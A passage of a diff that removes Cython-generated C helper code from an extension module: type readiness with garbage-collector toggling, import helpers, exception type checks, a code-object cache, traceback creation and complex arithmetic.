PyType_Ready */ -static int __Pyx_PyType_Ready(PyTypeObject *t) { -#if CYTHON_USE_TYPE_SPECS || !(CYTHON_COMPILING_IN_CPYTHON || CYTHON_COMPILING_IN_LIMITED_API) || defined(PYSTON_MAJOR_VERSION) - (void)__Pyx_PyObject_CallMethod0; -#if CYTHON_USE_TYPE_SPECS - (void)__Pyx_validate_bases_tuple; -#endif - return PyType_Ready(t); -#else - int r; - PyObject *bases = __Pyx_PyType_GetSlot(t, tp_bases, PyObject*); - if (bases && unlikely(__Pyx_validate_bases_tuple(t->tp_name, t->tp_dictoffset, bases) == -1)) - return -1; -#if 
PY_VERSION_HEX >= 0x03050000 && !defined(PYSTON_MAJOR_VERSION) - { - int gc_was_enabled; - #if PY_VERSION_HEX >= 0x030A00b1 - gc_was_enabled = PyGC_Disable(); - (void)__Pyx_PyObject_CallMethod0; - #else - PyObject *ret, *py_status; - PyObject *gc = NULL; - #if PY_VERSION_HEX >= 0x030700a1 && (!CYTHON_COMPILING_IN_PYPY || PYPY_VERSION_NUM+0 >= 0x07030400) - gc = PyImport_GetModule(__pyx_kp_u_gc); - #endif - if (unlikely(!gc)) gc = PyImport_Import(__pyx_kp_u_gc); - if (unlikely(!gc)) return -1; - py_status = __Pyx_PyObject_CallMethod0(gc, __pyx_kp_u_isenabled); - if (unlikely(!py_status)) { - Py_DECREF(gc); - return -1; - } - gc_was_enabled = __Pyx_PyObject_IsTrue(py_status); - Py_DECREF(py_status); - if (gc_was_enabled > 0) { - ret = __Pyx_PyObject_CallMethod0(gc, __pyx_kp_u_disable); - if (unlikely(!ret)) { - Py_DECREF(gc); - return -1; - } - Py_DECREF(ret); - } else if (unlikely(gc_was_enabled == -1)) { - Py_DECREF(gc); - return -1; - } - #endif - t->tp_flags |= Py_TPFLAGS_HEAPTYPE; -#if PY_VERSION_HEX >= 0x030A0000 - t->tp_flags |= Py_TPFLAGS_IMMUTABLETYPE; -#endif -#else - (void)__Pyx_PyObject_CallMethod0; -#endif - r = PyType_Ready(t); -#if PY_VERSION_HEX >= 0x03050000 && !defined(PYSTON_MAJOR_VERSION) - t->tp_flags &= ~Py_TPFLAGS_HEAPTYPE; - #if PY_VERSION_HEX >= 0x030A00b1 - if (gc_was_enabled) - PyGC_Enable(); - #else - if (gc_was_enabled) { - PyObject *tp, *v, *tb; - PyErr_Fetch(&tp, &v, &tb); - ret = __Pyx_PyObject_CallMethod0(gc, __pyx_kp_u_enable); - if (likely(ret || r == -1)) { - Py_XDECREF(ret); - PyErr_Restore(tp, v, tb); - } else { - Py_XDECREF(tp); - Py_XDECREF(v); - Py_XDECREF(tb); - r = -1; - } - } - Py_DECREF(gc); - #endif - } -#endif - return r; -#endif -} - -/* Import */ -static PyObject *__Pyx_Import(PyObject *name, PyObject *from_list, int level) { - PyObject *module = 0; - PyObject *empty_dict = 0; - PyObject *empty_list = 0; - #if PY_MAJOR_VERSION < 3 - PyObject *py_import; - py_import = __Pyx_PyObject_GetAttrStr(__pyx_b, 
__pyx_n_s_import); - if (unlikely(!py_import)) - goto bad; - if (!from_list) { - empty_list = PyList_New(0); - if (unlikely(!empty_list)) - goto bad; - from_list = empty_list; - } - #endif - empty_dict = PyDict_New(); - if (unlikely(!empty_dict)) - goto bad; - { - #if PY_MAJOR_VERSION >= 3 - if (level == -1) { - if (strchr(__Pyx_MODULE_NAME, '.') != NULL) { - module = PyImport_ImportModuleLevelObject( - name, __pyx_d, empty_dict, from_list, 1); - if (unlikely(!module)) { - if (unlikely(!PyErr_ExceptionMatches(PyExc_ImportError))) - goto bad; - PyErr_Clear(); - } - } - level = 0; - } - #endif - if (!module) { - #if PY_MAJOR_VERSION < 3 - PyObject *py_level = PyInt_FromLong(level); - if (unlikely(!py_level)) - goto bad; - module = PyObject_CallFunctionObjArgs(py_import, - name, __pyx_d, empty_dict, from_list, py_level, (PyObject *)NULL); - Py_DECREF(py_level); - #else - module = PyImport_ImportModuleLevelObject( - name, __pyx_d, empty_dict, from_list, level); - #endif - } - } -bad: - Py_XDECREF(empty_dict); - Py_XDECREF(empty_list); - #if PY_MAJOR_VERSION < 3 - Py_XDECREF(py_import); - #endif - return module; -} - -/* ImportFrom */ -static PyObject* __Pyx_ImportFrom(PyObject* module, PyObject* name) { - PyObject* value = __Pyx_PyObject_GetAttrStr(module, name); - if (unlikely(!value) && PyErr_ExceptionMatches(PyExc_AttributeError)) { - const char* module_name_str = 0; - PyObject* module_name = 0; - PyObject* module_dot = 0; - PyObject* full_name = 0; - PyErr_Clear(); - module_name_str = PyModule_GetName(module); - if (unlikely(!module_name_str)) { goto modbad; } - module_name = PyUnicode_FromString(module_name_str); - if (unlikely(!module_name)) { goto modbad; } - module_dot = PyUnicode_Concat(module_name, __pyx_kp_u__10); - if (unlikely(!module_dot)) { goto modbad; } - full_name = PyUnicode_Concat(module_dot, name); - if (unlikely(!full_name)) { goto modbad; } - #if PY_VERSION_HEX < 0x030700A1 || (CYTHON_COMPILING_IN_PYPY && PYPY_VERSION_NUM < 0x07030400) - { - 
PyObject *modules = PyImport_GetModuleDict(); - if (unlikely(!modules)) - goto modbad; - value = PyObject_GetItem(modules, full_name); - } - #else - value = PyImport_GetModule(full_name); - #endif - modbad: - Py_XDECREF(full_name); - Py_XDECREF(module_dot); - Py_XDECREF(module_name); - } - if (unlikely(!value)) { - PyErr_Format(PyExc_ImportError, - #if PY_MAJOR_VERSION < 3 - "cannot import name %.230s", PyString_AS_STRING(name)); - #else - "cannot import name %S", name); - #endif - } - return value; -} - -/* ImportDottedModule */ -#if PY_MAJOR_VERSION >= 3 -static PyObject *__Pyx__ImportDottedModule_Error(PyObject *name, PyObject *parts_tuple, Py_ssize_t count) { - PyObject *partial_name = NULL, *slice = NULL, *sep = NULL; - if (unlikely(PyErr_Occurred())) { - PyErr_Clear(); - } - if (likely(PyTuple_GET_SIZE(parts_tuple) == count)) { - partial_name = name; - } else { - slice = PySequence_GetSlice(parts_tuple, 0, count); - if (unlikely(!slice)) - goto bad; - sep = PyUnicode_FromStringAndSize(".", 1); - if (unlikely(!sep)) - goto bad; - partial_name = PyUnicode_Join(sep, slice); - } - PyErr_Format( -#if PY_MAJOR_VERSION < 3 - PyExc_ImportError, - "No module named '%s'", PyString_AS_STRING(partial_name)); -#else -#if PY_VERSION_HEX >= 0x030600B1 - PyExc_ModuleNotFoundError, -#else - PyExc_ImportError, -#endif - "No module named '%U'", partial_name); -#endif -bad: - Py_XDECREF(sep); - Py_XDECREF(slice); - Py_XDECREF(partial_name); - return NULL; -} -#endif -#if PY_MAJOR_VERSION >= 3 -static PyObject *__Pyx__ImportDottedModule_Lookup(PyObject *name) { - PyObject *imported_module; -#if PY_VERSION_HEX < 0x030700A1 || (CYTHON_COMPILING_IN_PYPY && PYPY_VERSION_NUM < 0x07030400) - PyObject *modules = PyImport_GetModuleDict(); - if (unlikely(!modules)) - return NULL; - imported_module = __Pyx_PyDict_GetItemStr(modules, name); - Py_XINCREF(imported_module); -#else - imported_module = PyImport_GetModule(name); -#endif - return imported_module; -} -#endif -#if PY_MAJOR_VERSION 
>= 3 -static PyObject *__Pyx_ImportDottedModule_WalkParts(PyObject *module, PyObject *name, PyObject *parts_tuple) { - Py_ssize_t i, nparts; - nparts = PyTuple_GET_SIZE(parts_tuple); - for (i=1; i < nparts && module; i++) { - PyObject *part, *submodule; -#if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS - part = PyTuple_GET_ITEM(parts_tuple, i); -#else - part = PySequence_ITEM(parts_tuple, i); -#endif - submodule = __Pyx_PyObject_GetAttrStrNoError(module, part); -#if !(CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS) - Py_DECREF(part); -#endif - Py_DECREF(module); - module = submodule; - } - if (unlikely(!module)) { - return __Pyx__ImportDottedModule_Error(name, parts_tuple, i); - } - return module; -} -#endif -static PyObject *__Pyx__ImportDottedModule(PyObject *name, PyObject *parts_tuple) { -#if PY_MAJOR_VERSION < 3 - PyObject *module, *from_list, *star = __pyx_n_s__11; - CYTHON_UNUSED_VAR(parts_tuple); - from_list = PyList_New(1); - if (unlikely(!from_list)) - return NULL; - Py_INCREF(star); - PyList_SET_ITEM(from_list, 0, star); - module = __Pyx_Import(name, from_list, 0); - Py_DECREF(from_list); - return module; -#else - PyObject *imported_module; - PyObject *module = __Pyx_Import(name, NULL, 0); - if (!parts_tuple || unlikely(!module)) - return module; - imported_module = __Pyx__ImportDottedModule_Lookup(name); - if (likely(imported_module)) { - Py_DECREF(module); - return imported_module; - } - PyErr_Clear(); - return __Pyx_ImportDottedModule_WalkParts(module, name, parts_tuple); -#endif -} -static PyObject *__Pyx_ImportDottedModule(PyObject *name, PyObject *parts_tuple) { -#if CYTHON_COMPILING_IN_CPYTHON && PY_VERSION_HEX >= 0x030400B1 - PyObject *module = __Pyx__ImportDottedModule_Lookup(name); - if (likely(module)) { - PyObject *spec = __Pyx_PyObject_GetAttrStrNoError(module, __pyx_n_s_spec); - if (likely(spec)) { - PyObject *unsafe = __Pyx_PyObject_GetAttrStrNoError(spec, __pyx_n_s_initializing); - if (likely(!unsafe || 
!__Pyx_PyObject_IsTrue(unsafe))) { - Py_DECREF(spec); - spec = NULL; - } - Py_XDECREF(unsafe); - } - if (likely(!spec)) { - PyErr_Clear(); - return module; - } - Py_DECREF(spec); - Py_DECREF(module); - } else if (PyErr_Occurred()) { - PyErr_Clear(); - } -#endif - return __Pyx__ImportDottedModule(name, parts_tuple); -} - -/* FastTypeChecks */ -#if CYTHON_COMPILING_IN_CPYTHON -static int __Pyx_InBases(PyTypeObject *a, PyTypeObject *b) { - while (a) { - a = __Pyx_PyType_GetSlot(a, tp_base, PyTypeObject*); - if (a == b) - return 1; - } - return b == &PyBaseObject_Type; -} -static CYTHON_INLINE int __Pyx_IsSubtype(PyTypeObject *a, PyTypeObject *b) { - PyObject *mro; - if (a == b) return 1; - mro = a->tp_mro; - if (likely(mro)) { - Py_ssize_t i, n; - n = PyTuple_GET_SIZE(mro); - for (i = 0; i < n; i++) { - if (PyTuple_GET_ITEM(mro, i) == (PyObject *)b) - return 1; - } - return 0; - } - return __Pyx_InBases(a, b); -} -static CYTHON_INLINE int __Pyx_IsAnySubtype2(PyTypeObject *cls, PyTypeObject *a, PyTypeObject *b) { - PyObject *mro; - if (cls == a || cls == b) return 1; - mro = cls->tp_mro; - if (likely(mro)) { - Py_ssize_t i, n; - n = PyTuple_GET_SIZE(mro); - for (i = 0; i < n; i++) { - PyObject *base = PyTuple_GET_ITEM(mro, i); - if (base == (PyObject *)a || base == (PyObject *)b) - return 1; - } - return 0; - } - return __Pyx_InBases(cls, a) || __Pyx_InBases(cls, b); -} -#if PY_MAJOR_VERSION == 2 -static int __Pyx_inner_PyErr_GivenExceptionMatches2(PyObject *err, PyObject* exc_type1, PyObject* exc_type2) { - PyObject *exception, *value, *tb; - int res; - __Pyx_PyThreadState_declare - __Pyx_PyThreadState_assign - __Pyx_ErrFetch(&exception, &value, &tb); - res = exc_type1 ? 
PyObject_IsSubclass(err, exc_type1) : 0; - if (unlikely(res == -1)) { - PyErr_WriteUnraisable(err); - res = 0; - } - if (!res) { - res = PyObject_IsSubclass(err, exc_type2); - if (unlikely(res == -1)) { - PyErr_WriteUnraisable(err); - res = 0; - } - } - __Pyx_ErrRestore(exception, value, tb); - return res; -} -#else -static CYTHON_INLINE int __Pyx_inner_PyErr_GivenExceptionMatches2(PyObject *err, PyObject* exc_type1, PyObject *exc_type2) { - if (exc_type1) { - return __Pyx_IsAnySubtype2((PyTypeObject*)err, (PyTypeObject*)exc_type1, (PyTypeObject*)exc_type2); - } else { - return __Pyx_IsSubtype((PyTypeObject*)err, (PyTypeObject*)exc_type2); - } -} -#endif -static int __Pyx_PyErr_GivenExceptionMatchesTuple(PyObject *exc_type, PyObject *tuple) { - Py_ssize_t i, n; - assert(PyExceptionClass_Check(exc_type)); - n = PyTuple_GET_SIZE(tuple); -#if PY_MAJOR_VERSION >= 3 - for (i=0; i<n; i++) { - if (exc_type == PyTuple_GET_ITEM(tuple, i)) return 1; - } -#endif - for (i=0; i<n; i++) { - PyObject *t = PyTuple_GET_ITEM(tuple, i); - #if PY_MAJOR_VERSION < 3 - if (likely(exc_type == t)) return 1; - #endif - if (likely(PyExceptionClass_Check(t))) { - if (__Pyx_inner_PyErr_GivenExceptionMatches2(exc_type, NULL, t)) return 1; - } else { - } - } - return 0; -} -static CYTHON_INLINE int __Pyx_PyErr_GivenExceptionMatches(PyObject *err, PyObject* exc_type) { - if (likely(err == exc_type)) return 1; - if (likely(PyExceptionClass_Check(err))) { - if (likely(PyExceptionClass_Check(exc_type))) { - return __Pyx_inner_PyErr_GivenExceptionMatches2(err, NULL, exc_type); - } else if (likely(PyTuple_Check(exc_type))) { - return __Pyx_PyErr_GivenExceptionMatchesTuple(err, exc_type); - } else { - } - } - return PyErr_GivenExceptionMatches(err, exc_type); -} -static CYTHON_INLINE int __Pyx_PyErr_GivenExceptionMatches2(PyObject *err, PyObject *exc_type1, PyObject *exc_type2) { - assert(PyExceptionClass_Check(exc_type1)); - assert(PyExceptionClass_Check(exc_type2)); - if (likely(err == exc_type1 || err == exc_type2)) return 1; - if (likely(PyExceptionClass_Check(err))) { - return __Pyx_inner_PyErr_GivenExceptionMatches2(err, exc_type1, exc_type2); - } - return (PyErr_GivenExceptionMatches(err, exc_type1) || PyErr_GivenExceptionMatches(err, exc_type2)); -} -#endif - -/* CodeObjectCache */ -#if !CYTHON_COMPILING_IN_LIMITED_API -static int __pyx_bisect_code_objects(__Pyx_CodeObjectCacheEntry* entries, int count, int code_line) { - int start = 0, mid = 0, end = count - 1; - if (end >= 0 && code_line > entries[end].code_line) { - return count; - } - while (start < end) { - mid = start + (end - start) / 2; - if (code_line < entries[mid].code_line) { - end = mid; - } else if (code_line > entries[mid].code_line) { - start = mid + 1; - } else { - return mid; - } - } - if (code_line <= entries[mid].code_line) { - return mid; - } else { - return mid + 1; - } -} -static PyCodeObject *__pyx_find_code_object(int code_line) { - PyCodeObject* code_object; - int pos; - if (unlikely(!code_line) || unlikely(!__pyx_code_cache.entries)) { - return NULL; - } - pos = __pyx_bisect_code_objects(__pyx_code_cache.entries, __pyx_code_cache.count, code_line); - if (unlikely(pos >= __pyx_code_cache.count) || unlikely(__pyx_code_cache.entries[pos].code_line != code_line)) { - return NULL; - } - code_object = __pyx_code_cache.entries[pos].code_object; - Py_INCREF(code_object); - return code_object; -} -static void __pyx_insert_code_object(int code_line, PyCodeObject* code_object) { - int pos, i; - __Pyx_CodeObjectCacheEntry* entries = __pyx_code_cache.entries; - if (unlikely(!code_line)) { - return; - 
} - if (unlikely(!entries)) { - entries = (__Pyx_CodeObjectCacheEntry*)PyMem_Malloc(64*sizeof(__Pyx_CodeObjectCacheEntry)); - if (likely(entries)) { - __pyx_code_cache.entries = entries; - __pyx_code_cache.max_count = 64; - __pyx_code_cache.count = 1; - entries[0].code_line = code_line; - entries[0].code_object = code_object; - Py_INCREF(code_object); - } - return; - } - pos = __pyx_bisect_code_objects(__pyx_code_cache.entries, __pyx_code_cache.count, code_line); - if ((pos < __pyx_code_cache.count) && unlikely(__pyx_code_cache.entries[pos].code_line == code_line)) { - PyCodeObject* tmp = entries[pos].code_object; - entries[pos].code_object = code_object; - Py_DECREF(tmp); - return; - } - if (__pyx_code_cache.count == __pyx_code_cache.max_count) { - int new_max = __pyx_code_cache.max_count + 64; - entries = (__Pyx_CodeObjectCacheEntry*)PyMem_Realloc( - __pyx_code_cache.entries, ((size_t)new_max) * sizeof(__Pyx_CodeObjectCacheEntry)); - if (unlikely(!entries)) { - return; - } - __pyx_code_cache.entries = entries; - __pyx_code_cache.max_count = new_max; - } - for (i=__pyx_code_cache.count; i>pos; i--) { - entries[i] = entries[i-1]; - } - entries[pos].code_line = code_line; - entries[pos].code_object = code_object; - __pyx_code_cache.count++; - Py_INCREF(code_object); -} -#endif - -/* AddTraceback */ -#include "compile.h" -#include "frameobject.h" -#include "traceback.h" -#if PY_VERSION_HEX >= 0x030b00a6 && !CYTHON_COMPILING_IN_LIMITED_API - #ifndef Py_BUILD_CORE - #define Py_BUILD_CORE 1 - #endif - #include "internal/pycore_frame.h" -#endif -#if CYTHON_COMPILING_IN_LIMITED_API -static PyObject *__Pyx_PyCode_Replace_For_AddTraceback(PyObject *code, PyObject *scratch_dict, - PyObject *firstlineno, PyObject *name) { - PyObject *replace = NULL; - if (unlikely(PyDict_SetItemString(scratch_dict, "co_firstlineno", firstlineno))) return NULL; - if (unlikely(PyDict_SetItemString(scratch_dict, "co_name", name))) return NULL; - replace = PyObject_GetAttrString(code, "replace"); 
- if (likely(replace)) { - PyObject *result; - result = PyObject_Call(replace, __pyx_empty_tuple, scratch_dict); - Py_DECREF(replace); - return result; - } - #if __PYX_LIMITED_VERSION_HEX < 0x030780000 - PyErr_Clear(); - { - PyObject *compiled = NULL, *result = NULL; - if (unlikely(PyDict_SetItemString(scratch_dict, "code", code))) return NULL; - if (unlikely(PyDict_SetItemString(scratch_dict, "type", (PyObject*)(&PyType_Type)))) return NULL; - compiled = Py_CompileString( - "out = type(code)(\n" - " code.co_argcount, code.co_kwonlyargcount, code.co_nlocals, code.co_stacksize,\n" - " code.co_flags, code.co_code, code.co_consts, code.co_names,\n" - " code.co_varnames, code.co_filename, co_name, co_firstlineno,\n" - " code.co_lnotab)\n", "", Py_file_input); - if (!compiled) return NULL; - result = PyEval_EvalCode(compiled, scratch_dict, scratch_dict); - Py_DECREF(compiled); - if (!result) PyErr_Print(); - Py_XDECREF(result); - result = PyDict_GetItemString(scratch_dict, "out"); - if (result) Py_INCREF(result); - return result; - } - #endif -} -static void __Pyx_AddTraceback(const char *funcname, int c_line, - int py_line, const char *filename) { - PyObject *code_object = NULL, *py_py_line = NULL, *py_funcname = NULL, *dict = NULL; - PyObject *replace = NULL, *getframe = NULL, *frame = NULL; - PyObject *exc_type, *exc_value, *exc_traceback; - int success = 0; - if (c_line) { - (void) __pyx_cfilenm; - (void) __Pyx_CLineForTraceback(__Pyx_PyThreadState_Current, c_line); - } - PyErr_Fetch(&exc_type, &exc_value, &exc_traceback); - code_object = Py_CompileString("_getframe()", filename, Py_eval_input); - if (unlikely(!code_object)) goto bad; - py_py_line = PyLong_FromLong(py_line); - if (unlikely(!py_py_line)) goto bad; - py_funcname = PyUnicode_FromString(funcname); - if (unlikely(!py_funcname)) goto bad; - dict = PyDict_New(); - if (unlikely(!dict)) goto bad; - { - PyObject *old_code_object = code_object; - code_object = __Pyx_PyCode_Replace_For_AddTraceback(code_object, 
dict, py_py_line, py_funcname); - Py_DECREF(old_code_object); - } - if (unlikely(!code_object)) goto bad; - getframe = PySys_GetObject("_getframe"); - if (unlikely(!getframe)) goto bad; - if (unlikely(PyDict_SetItemString(dict, "_getframe", getframe))) goto bad; - frame = PyEval_EvalCode(code_object, dict, dict); - if (unlikely(!frame) || frame == Py_None) goto bad; - success = 1; - bad: - PyErr_Restore(exc_type, exc_value, exc_traceback); - Py_XDECREF(code_object); - Py_XDECREF(py_py_line); - Py_XDECREF(py_funcname); - Py_XDECREF(dict); - Py_XDECREF(replace); - if (success) { - PyTraceBack_Here( - (struct _frame*)frame); - } - Py_XDECREF(frame); -} -#else -static PyCodeObject* __Pyx_CreateCodeObjectForTraceback( - const char *funcname, int c_line, - int py_line, const char *filename) { - PyCodeObject *py_code = NULL; - PyObject *py_funcname = NULL; - #if PY_MAJOR_VERSION < 3 - PyObject *py_srcfile = NULL; - py_srcfile = PyString_FromString(filename); - if (!py_srcfile) goto bad; - #endif - if (c_line) { - #if PY_MAJOR_VERSION < 3 - py_funcname = PyString_FromFormat( "%s (%s:%d)", funcname, __pyx_cfilenm, c_line); - if (!py_funcname) goto bad; - #else - py_funcname = PyUnicode_FromFormat( "%s (%s:%d)", funcname, __pyx_cfilenm, c_line); - if (!py_funcname) goto bad; - funcname = PyUnicode_AsUTF8(py_funcname); - if (!funcname) goto bad; - #endif - } - else { - #if PY_MAJOR_VERSION < 3 - py_funcname = PyString_FromString(funcname); - if (!py_funcname) goto bad; - #endif - } - #if PY_MAJOR_VERSION < 3 - py_code = __Pyx_PyCode_New( - 0, - 0, - 0, - 0, - 0, - 0, - __pyx_empty_bytes, /*PyObject *code,*/ - __pyx_empty_tuple, /*PyObject *consts,*/ - __pyx_empty_tuple, /*PyObject *names,*/ - __pyx_empty_tuple, /*PyObject *varnames,*/ - __pyx_empty_tuple, /*PyObject *freevars,*/ - __pyx_empty_tuple, /*PyObject *cellvars,*/ - py_srcfile, /*PyObject *filename,*/ - py_funcname, /*PyObject *name,*/ - py_line, - __pyx_empty_bytes /*PyObject *lnotab*/ - ); - Py_DECREF(py_srcfile); 
- #else - py_code = PyCode_NewEmpty(filename, funcname, py_line); - #endif - Py_XDECREF(py_funcname); // XDECREF since it's only set on Py3 if cline - return py_code; -bad: - Py_XDECREF(py_funcname); - #if PY_MAJOR_VERSION < 3 - Py_XDECREF(py_srcfile); - #endif - return NULL; -} -static void __Pyx_AddTraceback(const char *funcname, int c_line, - int py_line, const char *filename) { - PyCodeObject *py_code = 0; - PyFrameObject *py_frame = 0; - PyThreadState *tstate = __Pyx_PyThreadState_Current; - PyObject *ptype, *pvalue, *ptraceback; - if (c_line) { - c_line = __Pyx_CLineForTraceback(tstate, c_line); - } - py_code = __pyx_find_code_object(c_line ? -c_line : py_line); - if (!py_code) { - __Pyx_ErrFetchInState(tstate, &ptype, &pvalue, &ptraceback); - py_code = __Pyx_CreateCodeObjectForTraceback( - funcname, c_line, py_line, filename); - if (!py_code) { - /* If the code object creation fails, then we should clear the - fetched exception references and propagate the new exception */ - Py_XDECREF(ptype); - Py_XDECREF(pvalue); - Py_XDECREF(ptraceback); - goto bad; - } - __Pyx_ErrRestoreInState(tstate, ptype, pvalue, ptraceback); - __pyx_insert_code_object(c_line ? 
-c_line : py_line, py_code); - } - py_frame = PyFrame_New( - tstate, /*PyThreadState *tstate,*/ - py_code, /*PyCodeObject *code,*/ - __pyx_d, /*PyObject *globals,*/ - 0 /*PyObject *locals*/ - ); - if (!py_frame) goto bad; - __Pyx_PyFrame_SetLineNumber(py_frame, py_line); - PyTraceBack_Here(py_frame); -bad: - Py_XDECREF(py_code); - Py_XDECREF(py_frame); -} -#endif - -/* Declarations */ -#if CYTHON_CCOMPLEX && (1) && (!0 || __cplusplus) - #ifdef __cplusplus - static CYTHON_INLINE __pyx_t_double_complex __pyx_t_double_complex_from_parts(double x, double y) { - return ::std::complex< double >(x, y); - } - #else - static CYTHON_INLINE __pyx_t_double_complex __pyx_t_double_complex_from_parts(double x, double y) { - return x + y*(__pyx_t_double_complex)_Complex_I; - } - #endif -#else - static CYTHON_INLINE __pyx_t_double_complex __pyx_t_double_complex_from_parts(double x, double y) { - __pyx_t_double_complex z; - z.real = x; - z.imag = y; - return z; - } -#endif - -/* Arithmetic */ -#if CYTHON_CCOMPLEX && (1) && (!0 || __cplusplus) -#else - static CYTHON_INLINE int __Pyx_c_eq_double(__pyx_t_double_complex a, __pyx_t_double_complex b) { - return (a.real == b.real) && (a.imag == b.imag); - } - static CYTHON_INLINE __pyx_t_double_complex __Pyx_c_sum_double(__pyx_t_double_complex a, __pyx_t_double_complex b) { - __pyx_t_double_complex z; - z.real = a.real + b.real; - z.imag = a.imag + b.imag; - return z; - } - static CYTHON_INLINE __pyx_t_double_complex __Pyx_c_diff_double(__pyx_t_double_complex a, __pyx_t_double_complex b) { - __pyx_t_double_complex z; - z.real = a.real - b.real; - z.imag = a.imag - b.imag; - return z; - } - static CYTHON_INLINE __pyx_t_double_complex __Pyx_c_prod_double(__pyx_t_double_complex a, __pyx_t_double_complex b) { - __pyx_t_double_complex z; - z.real = a.real * b.real - a.imag * b.imag; - z.imag = a.real * b.imag + a.imag * b.real; - return z; - } - #if 1 - static CYTHON_INLINE __pyx_t_double_complex __Pyx_c_quot_double(__pyx_t_double_complex a, 
__pyx_t_double_complex b) { - if (b.imag == 0) { - return __pyx_t_double_complex_from_parts(a.real / b.real, a.imag / b.real); - } else if (fabs(b.real) >= fabs(b.imag)) { - if (b.real == 0 && b.imag == 0) { - return __pyx_t_double_complex_from_parts(a.real / b.real, a.imag / b.imag); - } else { - double r = b.imag / b.real; - double s = (double)(1.0) / (b.real + b.imag * r); - return __pyx_t_double_complex_from_parts( - (a.real + a.imag * r) * s, (a.imag - a.real * r) * s); - } - } else { - double r = b.real / b.imag; - double s = (double)(1.0) / (b.imag + b.real * r); - return __pyx_t_double_complex_from_parts( - (a.real * r + a.imag) * s, (a.imag * r - a.real) * s); - } - } - #else - static CYTHON_INLINE __pyx_t_double_complex __Pyx_c_quot_double(__pyx_t_double_complex a, __pyx_t_double_complex b) { - if (b.imag == 0) { - return __pyx_t_double_complex_from_parts(a.real / b.real, a.imag / b.real); - } else { - double denom = b.real * b.real + b.imag * b.imag; - return __pyx_t_double_complex_from_parts( - (a.real * b.real + a.imag * b.imag) / denom, - (a.imag * b.real - a.real * b.imag) / denom); - } - } - #endif - static CYTHON_INLINE __pyx_t_double_complex __Pyx_c_neg_double(__pyx_t_double_complex a) { - __pyx_t_double_complex z; - z.real = -a.real; - z.imag = -a.imag; - return z; - } - static CYTHON_INLINE int __Pyx_c_is_zero_double(__pyx_t_double_complex a) { - return (a.real == 0) && (a.imag == 0); - } - static CYTHON_INLINE __pyx_t_double_complex __Pyx_c_conj_double(__pyx_t_double_complex a) { - __pyx_t_double_complex z; - z.real = a.real; - z.imag = -a.imag; - return z; - } - #if 1 - static CYTHON_INLINE double __Pyx_c_abs_double(__pyx_t_double_complex z) { - #if !defined(HAVE_HYPOT) || defined(_MSC_VER) - return sqrt(z.real*z.real + z.imag*z.imag); - #else - return hypot(z.real, z.imag); - #endif - } - static CYTHON_INLINE __pyx_t_double_complex __Pyx_c_pow_double(__pyx_t_double_complex a, __pyx_t_double_complex b) { - __pyx_t_double_complex z; - double r, 
lnr, theta, z_r, z_theta; - if (b.imag == 0 && b.real == (int)b.real) { - if (b.real < 0) { - double denom = a.real * a.real + a.imag * a.imag; - a.real = a.real / denom; - a.imag = -a.imag / denom; - b.real = -b.real; - } - switch ((int)b.real) { - case 0: - z.real = 1; - z.imag = 0; - return z; - case 1: - return a; - case 2: - return __Pyx_c_prod_double(a, a); - case 3: - z = __Pyx_c_prod_double(a, a); - return __Pyx_c_prod_double(z, a); - case 4: - z = __Pyx_c_prod_double(a, a); - return __Pyx_c_prod_double(z, z); - } - } - if (a.imag == 0) { - if (a.real == 0) { - return a; - } else if ((b.imag == 0) && (a.real >= 0)) { - z.real = pow(a.real, b.real); - z.imag = 0; - return z; - } else if (a.real > 0) { - r = a.real; - theta = 0; - } else { - r = -a.real; - theta = atan2(0.0, -1.0); - } - } else { - r = __Pyx_c_abs_double(a); - theta = atan2(a.imag, a.real); - } - lnr = log(r); - z_r = exp(lnr * b.real - theta * b.imag); - z_theta = theta * b.real + lnr * b.imag; - z.real = z_r * cos(z_theta); - z.imag = z_r * sin(z_theta); - return z; - } - #endif -#endif - -/* FromPy */ -static __pyx_t_double_complex __Pyx_PyComplex_As___pyx_t_double_complex(PyObject* o) { - Py_complex cval; -#if !CYTHON_COMPILING_IN_PYPY - if (PyComplex_CheckExact(o)) - cval = ((PyComplexObject *)o)->cval; - else -#endif - cval = PyComplex_AsCComplex(o); - return __pyx_t_double_complex_from_parts( - (double)cval.real, - (double)cval.imag); -} - -/* CIntToPy */ -static CYTHON_INLINE PyObject* __Pyx_PyInt_From_long(long value) { -#ifdef __Pyx_HAS_GCC_DIAGNOSTIC -#pragma GCC diagnostic push -#pragma GCC diagnostic ignored "-Wconversion" -#endif - const long neg_one = (long) -1, const_zero = (long) 0; -#ifdef __Pyx_HAS_GCC_DIAGNOSTIC -#pragma GCC diagnostic pop -#endif - const int is_unsigned = neg_one > const_zero; - if (is_unsigned) { - if (sizeof(long) < sizeof(long)) { - return PyInt_FromLong((long) value); - } else if (sizeof(long) <= sizeof(unsigned long)) { - return 
PyLong_FromUnsignedLong((unsigned long) value); -#ifdef HAVE_LONG_LONG - } else if (sizeof(long) <= sizeof(unsigned PY_LONG_LONG)) { - return PyLong_FromUnsignedLongLong((unsigned PY_LONG_LONG) value); -#endif - } - } else { - if (sizeof(long) <= sizeof(long)) { - return PyInt_FromLong((long) value); -#ifdef HAVE_LONG_LONG - } else if (sizeof(long) <= sizeof(PY_LONG_LONG)) { - return PyLong_FromLongLong((PY_LONG_LONG) value); -#endif - } - } - { - int one = 1; int little = (int)*(unsigned char *)&one; - unsigned char *bytes = (unsigned char *)&value; -#if !CYTHON_COMPILING_IN_LIMITED_API - return _PyLong_FromByteArray(bytes, sizeof(long), - little, !is_unsigned); -#else - PyObject *from_bytes, *result = NULL; - PyObject *py_bytes = NULL, *arg_tuple = NULL, *kwds = NULL, *order_str = NULL; - from_bytes = PyObject_GetAttrString((PyObject*)&PyInt_Type, "from_bytes"); - if (!from_bytes) return NULL; - py_bytes = PyBytes_FromStringAndSize((char*)bytes, sizeof(long)); - if (!py_bytes) goto limited_bad; - order_str = PyUnicode_FromString(little ? "little" : "big"); - if (!order_str) goto limited_bad; - arg_tuple = PyTuple_Pack(2, py_bytes, order_str); - if (!arg_tuple) goto limited_bad; - kwds = PyDict_New(); - if (!kwds) goto limited_bad; - if (PyDict_SetItemString(kwds, "signed", __Pyx_NewRef(!is_unsigned ? 
